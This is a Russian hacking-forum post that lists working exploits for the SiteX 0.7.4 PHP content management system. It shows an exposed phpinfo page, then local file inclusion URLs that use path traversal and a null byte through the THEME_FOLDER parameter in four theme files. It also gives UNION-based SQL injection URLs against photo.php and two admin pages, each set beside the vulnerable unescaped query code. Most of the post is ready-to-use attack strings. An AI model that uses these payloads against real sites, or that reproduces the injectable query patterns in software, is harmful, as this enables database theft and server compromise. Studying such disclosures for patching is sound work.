|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Уязвимости SiteX 0.7 Beta
Product : SiteX 0.7.4 build 405
PHPinfo
Код:
http://localhost/setup/phpinfo.php
LFI
PHP код:
include("themes/$THEME_FOLDER/header.php");
magic_quotes=off
register_globals=on
results :
Код:
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00
SQL Injection
magic_quotes=off, register_globals=on
photo.php
PHP код:
$query = "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result = mysql_query($query, $Link) or queryError("11", mysql_error());
$sxPhoto = mysql_fetch_object($result);
$sxNewViews = $sxPhoto->views + 1;
$sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error());
$queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error());
$ROWA = mysql_fetch_object($resultA);
result :
Код:
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
PHP код:
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
$query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
if($private)
{
foreach ($user_types as $k => $v)
{
$query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
}
}
header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
die();
}
$query = "SELECT * FROM $DB_Pages WHERE id='$pageid'";
result :
Код:
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+
admin/journal_edit.php
PHP код:
$query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
writeRSSXML();
header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
die();
//$message = $sxLang['MessageJournalEdited'];
}
$query = "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
$ROW = mysql_fetch_object($result);
result :
Код:
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
Последний раз редактировалось [x60]unu; 25.02.2010 в 18:45..
|